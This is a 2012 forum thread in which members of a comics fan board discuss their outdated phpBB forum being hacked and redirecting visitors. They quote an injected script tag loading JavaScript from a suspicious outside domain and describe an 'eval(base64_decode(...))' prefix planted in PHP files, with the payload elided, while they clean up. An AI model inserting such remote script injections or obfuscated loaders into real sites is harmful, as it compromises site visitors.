Forum hacked?
Moderators: Mayhem, Steve Hubbell, Moderators
- Mayhem
- Daimyo <High-Ranking Lord>
- Posts: 2955
- Joined: Wed Sep 18, 2002 3:54 -0700
- Location: London, England
Pinging up the index.php source in IE8 (yes, it tried to redirect when I used that browser) reveals this at the bottom of the code:
<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>
Googling that URL pulls up just one hit online for a compromise at Dreamhost:
http://community.mybb.com/thread-114345.html
Which then leads to this thread:
http://discussion.dreamhost.com/thread-134262.html
Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.
<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>
Googling that URL pulls up just one hit online for a compromise at Dreamhost:
http://community.mybb.com/thread-114345.html
Which then leads to this thread:
http://discussion.dreamhost.com/thread-134262.html
Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.
With a breeze comes a storm, but then you'll all be washed away...
-
- Shugyosha<Student Warrior>
- Posts: 34
- Joined: Sun Mar 09, 2003 2:51 -0700
I ran into something similar a while back on a domain I was running, I'm guessing the PHPBB that the dojoboard is running is probably a few revs behind. There have been quite a few security exploits with the older versions. I had to have the host provider run a grep to find all the files with the domain inserts and manually repair them.
- Todd Shogun
- Shogun
- Posts: 1916
- Joined: Fri Sep 20, 2002 12:43 -0700
- Location: Orange Co., California
- Contact:
- Todd Shogun
- Shogun
- Posts: 1916
- Joined: Fri Sep 20, 2002 12:43 -0700
- Location: Orange Co., California
- Contact:
- Stan Sakai
- Sensei
- Posts: 4896
- Joined: Wed Sep 18, 2002 12:21 -0700
-
- Shugyosha<Student Warrior>
- Posts: 34
- Joined: Sun Mar 09, 2003 2:51 -0700
- digulla
- Daimyo <High-Ranking Lord>
- Posts: 285
- Joined: Mon Aug 12, 2002 13:01 -0700
- Location: Zurich, Switzerland
- Contact:
I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).
The board itself is still vulnerable so it's just a question of time until it happens again.
Edit The virus did two changes:
1. There was a file .log/log1.txt which contains the list of sites to redirect to.
2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))
I'm not sure what this code did, my guess is that it kept the file above up to date plus it probably injected the code for the redirection into the HTML.
I kept the files just in case we want to analyze this further.
The board itself is still vulnerable so it's just a question of time until it happens again.
Edit The virus did two changes:
1. There was a file .log/log1.txt which contains the list of sites to redirect to.
2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))
I'm not sure what this code did, my guess is that it kept the file above up to date plus it probably injected the code for the redirection into the HTML.
I kept the files just in case we want to analyze this further.
Last edited by digulla on Sun Mar 04, 2012 14:32 -0700, edited 1 time in total.
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
- digulla
- Daimyo <High-Ranking Lord>
- Posts: 285
- Joined: Mon Aug 12, 2002 13:01 -0700
- Location: Zurich, Switzerland
- Contact:
Yes. I just never had the time to make the update.Mayhem wrote:Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
- digulla
- Daimyo <High-Ranking Lord>
- Posts: 285
- Joined: Mon Aug 12, 2002 13:01 -0700
- Location: Zurich, Switzerland
- Contact:
Here is more info: http://danhilltech.tumblr.com/post/1808 ... -dreamhost
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
- toine
- Shugyosha<Student Warrior>
- Posts: 30
- Joined: Tue Apr 05, 2005 9:16 -0700
- Location: Peterborough ON
- Contact:
I just have been redirected...digulla wrote:I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).
The board itself is still vulnerable so it's just a question of time until it happens again.

(chrome under ubuntu 11.10)
***************************************
"The future is unwritten, know your rights"
The Clash
***************************************
"The future is unwritten, know your rights"
The Clash
***************************************
Me,too....
Dear Readers,
I just got redirected using Firefox.
Best wishes to all!
go
I just got redirected using Firefox.
Best wishes to all!
go